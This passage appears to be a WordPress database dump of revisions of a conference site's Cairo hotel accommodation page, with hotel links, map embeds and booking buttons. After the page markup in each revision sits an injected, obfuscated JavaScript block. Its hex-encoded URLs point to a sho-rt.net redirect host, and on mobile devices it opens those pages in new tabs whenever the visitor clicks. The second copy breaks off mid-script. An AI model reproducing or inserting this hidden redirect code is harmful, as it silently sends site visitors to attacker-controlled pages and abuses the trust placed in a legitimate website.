href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:42:50','2023-07-18 23:42:50','',2685,'https://gsw2023.com/?p=5036',0,'revision','',0),
(5037,1,'2023-07-18 23:50:31','2023-07-18 23:50:31','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<p>&nbsp;</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\